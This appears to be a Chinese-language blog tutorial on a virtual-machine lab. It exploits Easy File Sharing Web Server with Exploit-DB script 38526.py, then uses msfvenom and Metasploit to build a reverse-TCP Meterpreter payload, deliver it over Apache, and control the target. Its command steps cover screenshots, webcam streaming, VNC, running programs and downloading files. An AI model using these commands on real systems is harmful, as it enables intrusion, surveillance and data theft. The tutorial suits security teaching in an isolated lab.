当前位置:   article > 正文

简单漏洞渗透复现_简易漏洞复现

简易漏洞复现

一、漏洞渗透测试
1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。
2、利用Nmap扫描发现靶机(Windows)运行了该服务。
3、利用该漏洞,使得靶机运行计算器。 

复现过程

实验环境:

攻击机:kali Linux2

靶机:win10x64

网络连接方式:NAT

kali和windows的虚拟机都可以在网上找到下载文件,这里提供一个网站可以下载windows的虚拟机,根据需要选择自己需要的版本就可以了。

https://www.xitongku.com/
(1)在靶机(win10)上运行Easy File Sharing Web Server

注意事项:port端口的选择要选择一个没有被其他应用占用的端口

(2)扫描一下kali,发现了win10的靶机

扫描口令:nmap -sV +kali 的IP地址

(3)得到了靶机的IP地址后,再扫描靶机的端口运行的软件版本,可以发现8000端口提供的Easy File Sharing Web Server 服务。

口令:nmap -sV +靶机IP地址

(4)用searchsploit命令查找一下

口令:searchsploit easy file sharing

可以看到下图的表分为两列,左边一列给出了漏洞渗透模块的名称,右边一列给出了所在的位置。

(5)选用38526.py的远程溢出漏洞渗透模块为例,对应所在位置为/usr/share/exploitdb/exploits/windows/remote/38526.py。这是一个python编写的脚本。在终端输入指令:python2 /usr/share/exploitdb/exploits/windows/remote/38526.py +靶机IP地址 端口号

注意事项:输入指令一定要输入python2,我之前一直输入python一直不成功。

(6)连接成功打开win10的靶机发现,EasyFileSharing这个服务器程序已经崩溃,另外渗透模块成功地在目标主机上启动了计算器程序。

二、Metasploit应用

实验环境:

攻击机:kali Linux2

靶机:win10x64

网络连接方式:NAT

1.生成被控端

在kali中输入命令“msfvenom -p windows/meterpreter/reverse_tcp lhost=kali的IP地址 lport=5555 -f exe -o /root/payload.exe”

lport那里是端口号,我用的是5555,root后面的文件名也可以自己设置,我设置的是payload,但要注意后缀名是exe可执行文件。

这里使用最点单的msfvenom命令来生成一个被控端程序,使用的被控端程序就是一个用于windows平台下的反向远程控制程序:windows/meterpreter/reverse_tcp,它的参数lhost的值为kali的IP地址,生成的文件如下图所示。

2.启动主控端

主控端需要在Metasploit中启动

POC,全称为"ProofofConcept”,中文是“概念验证”,常指一段漏洞证明的代码。
EXP,全称”Exploit”,中文“利用”,指利用系统漏洞进行攻击的动作。
Metasploit框架是可以添加漏洞代码片段,就好比一个军火库,它里面有各种武器供大家使用,当然也有新的武器被研发出来,放到武器库里面后,都可以使用,这就是框架的好处,新的攻击代码可以比较容易的加入MSF框架供大家使用。
Meterpreter中支持的命令有很多,一共分成9个种类,具体的可以去网上搜查相关资料,这里不做过多赘述。

(1)打开终端然后输入msfconsole就可以启动Metasploit

(2)启动handler命令

口令:use exploit/mult/handler

(3)设置payload

(4)修改LHOST参数

(5)修改LPORT参数

(6)输入“exploit”开启监听

(7)靶机运行payload.exe文件

运行后,kali上就会在Metasploit中打开了一个session,这表示从现在开始我们就可以通过被控端程序来控制目标计算机了。

注意事项:想要实现Metasploit的具体应用,需要靶机运行payload.exe这个kali生成的执行文件,将kali中的payload.exe移到靶机中的相关方法,可以在网上搜查,我的虚拟机不能直接利用VMtools直接移动,所以我是利用网站来下载的。具体方法如下:

(1)进入payload文件存放路径,将此文件复制到/var/www/html

口令:cp -v payload.exe /var/www/html(-v参数是显示详细信息,可加可不加)

进入目录/var/www/html/,将html目录下的其余文件删除

口令:rm 文件1 文件2 ……文件n

(2)开启apache服务

  Apache是一种常见的Web服务器软件,广泛用于Linux和其他UNIX操作系统上。它是自由软件,可以通过开放源代码的方式进行自由分发和修改。Apache提供了处理静态和动态内容的能力,而且还支持多种编程语言和脚本,如PHP、Python和Perl。此外,Apache还支持SSL、TLS和虚拟主机等功能,可以很好地满足大量的Web应用程序的需求。

口令:/etc/init.d/apache2 start

查看服务开启的状态

口令:/etc/init.d/apache2 status

(3)在win10靶机上打开浏览器,输入kali的IP,就可以下载payload文件了

3.获得靶机(windows)控制权

(1)获取靶机基本信息

口令:sysinfo

(2)获取靶机屏幕截图

口令:screenshot

由上图的提示,图片已经被保存到var/ww/html目录下,打开文件夹,即可查看到图片

(3)摄像头

查看靶机有几个摄像头:webcam_list

靶机舍友头视频获取:webcam_stream

由于这里的靶机是Win10,没有摄像头

(4)查看靶机当前目录文件

口令:dir

由于payload.exe文件是在Downloads这个文件夹中,故显示的就是这个文件夹的文件

(5)在靶机上启动程序

这里以启动靶机上的计算器为例

口令:execute -f calc.exe

返回靶机,可以看到计算器已经被启动

(6)查看靶机的实时屏幕

口令:run vnc

4.下载靶机上任意一个文件

(1)输入命令“ls”,查看到的是payload.exe这个文件所在文件夹的文件

(2)使用命令“download 文件名”即可下载文件

下载的路径为默认路径

打开文件夹即可看到下载的文件

声明:本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:【wpsshop博客】
推荐阅读
相关标签
  

闽ICP备14008679号